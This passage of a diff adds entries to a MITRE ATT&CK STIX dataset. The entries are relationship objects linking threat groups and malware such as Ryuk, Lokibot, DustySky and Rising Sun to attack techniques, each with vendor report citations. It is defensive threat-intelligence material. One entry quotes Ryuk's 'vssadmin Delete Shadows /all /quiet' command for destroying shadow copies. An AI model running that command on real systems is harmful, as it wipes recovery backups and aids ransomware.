+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "tool--03342581-f790-4f03-ba41-e82e67392e23",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d64f970a-8003-41bf-9769-d849c12340ed",
+ "type": "relationship",
+ "modified": "2020-05-14T14:40:26.232Z",
+ "created": "2020-05-14T14:40:26.232Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb",
+ "target_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "relationship_type": "uses",
+ "id": "relationship--e9f5096e-b9fc-459a-a303-88763b1269cc",
+ "external_references": [
+ {
+ "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
+ "source_name": "FireEye FIN6 Apr 2019"
+ }
+ ],
+ "description": "(Citation: FireEye FIN6 Apr 2019)",
+ "type": "relationship",
+ "modified": "2020-05-15T19:15:35.568Z",
+ "created": "2020-05-14T14:41:42.975Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has used vssadmin Delete Shadows /all /quiet to to delete volume shadow copies and vssadmin resize shadowstorage to force deletion of shadow copies created by third-party applications.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3194fa27-46b8-4a05-8d3a-12d7bfe9ad15",
+ "type": "relationship",
+ "modified": "2020-05-14T14:51:52.989Z",
+ "created": "2020-05-14T14:51:52.989Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "FireEye Ryuk and Trickbot January 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has stopped services related to anti-virus.(Citation: FireEye Ryuk and Trickbot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--156ab177-474c-495c-af01-3cb9147aa703",
+ "type": "relationship",
+ "modified": "2020-05-14T15:09:48.789Z",
+ "created": "2020-05-14T15:09:48.789Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) can shutdown the infected machine.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--43c9340b-453b-424a-b529-090288a54df8",
+ "type": "relationship",
+ "modified": "2020-05-14T15:14:33.474Z",
+ "created": "2020-05-14T15:14:33.474Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) can detect connected USB devices.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--62a7f7c2-435d-4ef6-aee3-add933fb241d",
+ "type": "relationship",
+ "modified": "2020-05-14T15:14:33.519Z",
+ "created": "2020-05-14T15:14:33.519Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) can delete files it creates from the infected system.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--339e60fc-f94c-4b51-bc78-846c29c4340d",
+ "type": "relationship",
+ "modified": "2020-05-14T15:14:33.524Z",
+ "created": "2020-05-14T15:14:33.524Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) lists all installed software for the infected machine.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2b89f806-5b78-4599-9536-13b47c35d26d",
+ "type": "relationship",
+ "modified": "2020-05-14T15:14:33.527Z",
+ "created": "2020-05-14T15:14:33.527Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) decompresses ZIP files once on the victim machine.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--497aec05-cb34-424d-943f-4fdfbf2585b4",
+ "type": "relationship",
+ "modified": "2020-05-14T15:35:08.806Z",
+ "created": "2020-05-14T15:35:08.806Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4",
+ "external_references": [
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has used process hollowing to inject into legitimate Windows process vbc.exe.(Citation: Infoblox Lokibot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--33a464ab-cc0d-436d-9bcd-9d6e08994370",
+ "type": "relationship",
+ "modified": "2020-05-18T13:38:59.124Z",
+ "created": "2020-05-14T19:06:50.917Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has obfuscated strings with base64 encoding.(Citation: Infoblox Lokibot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--0dd73de5-d615-4455-a552-ff382ec75e82",
+ "type": "relationship",
+ "modified": "2020-05-18T22:00:40.676Z",
+ "created": "2020-05-14T19:06:50.931Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Msiexec Feb 2018",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/",
+ "description": "Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has been executed through malicious documents contained in spearphishing e-mails.(Citation: TrendMicro Msiexec Feb 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--da33f077-8ce2-4a2d-a8ed-f9f21799c80e",
+ "type": "relationship",
+ "modified": "2020-05-14T19:06:50.933Z",
+ "created": "2020-05-14T19:06:50.933Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s Blowfish key is encrypted with a public RSA key.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--44de534a-f105-4016-b7a4-2e7fce8a203e",
+ "type": "relationship",
+ "modified": "2020-07-07T12:35:12.294Z",
+ "created": "2020-05-14T20:55:00.055Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) loader only executes the payload after the left mouse button has been pressed at least three times, in order to avoid being executed within virtualized or emulated environments.(Citation: ESET Okrum July 2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--121152af-4bfe-4202-ade0-aad9fb85e0ad",
+ "type": "relationship",
+ "modified": "2020-05-14T21:17:54.058Z",
+ "created": "2020-05-14T21:17:54.058Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) establishes persistence by creating a .lnk shortcut to itself in the Startup folder.(Citation: ESET Okrum July 2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--cab93d90-f8de-4bb3-8868-11b8d9a2ddf9",
+ "type": "relationship",
+ "modified": "2020-05-14T21:17:54.070Z",
+ "created": "2020-05-14T21:17:54.070Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104)'s first-stage downloader installed [Rising Sun](https://attack.mitre.org/software/S0448) to the startup folder %Startup%\\mssync.exe.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--e93e6c30-16aa-4f12-856b-19e96bdfdf28",
+ "type": "relationship",
+ "modified": "2020-05-14T21:53:42.091Z",
+ "created": "2020-05-14T21:40:31.188Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104)'s first-stage downloader resolved various Windows libraries and APIs, including LoadLibraryA(), GetProcAddress(), and CreateProcessA().(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--9123ca09-3152-404c-92ed-52982cc043d5",
+ "type": "relationship",
+ "modified": "2020-05-14T21:40:31.201Z",
+ "created": "2020-05-14T21:40:31.201Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104)'s first-stage downloader was a VBA macro.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--6571753b-b52d-4a30-b674-426f358253b0",
+ "type": "relationship",
+ "modified": "2020-05-14T21:40:31.204Z",
+ "created": "2020-05-14T21:40:31.204Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104) downloaded additional payloads after a target was infected with a first-stage downloader.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--164f3527-8811-4f4a-a561-060d010d78dd",
+ "type": "relationship",
+ "modified": "2020-05-14T21:40:31.207Z",
+ "created": "2020-05-14T21:40:31.207Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104) has leveraged embedded shellcode to inject a downloader into the memory of Word.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--aee0bd8a-1900-448b-bd88-5493f9ed8d28",
+ "type": "relationship",
+ "modified": "2020-06-30T03:05:58.589Z",
+ "created": "2020-05-14T21:40:31.248Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104) has sent malicious DOC and PDF files to targets so that they can be opened by a user.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--24d5ba1b-dbce-4c25-8180-1ee40b8c827f",
+ "type": "relationship",
+ "modified": "2020-06-30T03:08:45.055Z",
+ "created": "2020-05-14T21:40:31.265Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104) has sent malicious attachments via emails to targets.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--b65dc335-2dc2-41ca-8b68-a673a75761a2",
+ "type": "relationship",
+ "modified": "2020-05-14T21:40:31.268Z",
+ "created": "2020-05-14T21:40:31.268Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can clear process memory by overwriting it with junk bytes.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--811ba10b-6fe7-40d9-ab98-70d4135ac7cf",
+ "type": "relationship",
+ "modified": "2020-05-14T22:29:26.002Z",
+ "created": "2020-05-14T22:29:26.002Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can enumerate information about files from the infected system, including file size, attributes, creation time, last access time, and write time. [Rising Sun](https://attack.mitre.org/software/S0448) can enumerate the compilation timestamp of Windows executable files.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--cfaf6b8e-1ee0-40bf-8a60-27f9c68d86c5",
+ "type": "relationship",
+ "modified": "2020-06-23T00:42:36.379Z",
+ "created": "2020-05-14T22:29:26.004Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can send data gathered from the infected machine via HTTP POST request to the C2.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b3aa93e7-534f-4bd7-8df7-ed9dfa8ccccc",
+ "type": "relationship",
+ "modified": "2020-05-14T22:29:26.037Z",
+ "created": "2020-05-14T22:29:26.036Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can enumerate all running processes and process information on an infected machine.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8a7317fd-fa8f-4c32-8aa5-4ff225116f7e",
+ "type": "relationship",
+ "modified": "2020-05-14T22:29:26.039Z",
+ "created": "2020-05-14T22:29:26.039Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can delete files specified by the C2.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--0449ef6d-2ea2-40a3-9cc9-c07672d6a859",
+ "type": "relationship",
+ "modified": "2020-06-17T04:00:52.371Z",
+ "created": "2020-05-14T22:29:26.041Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
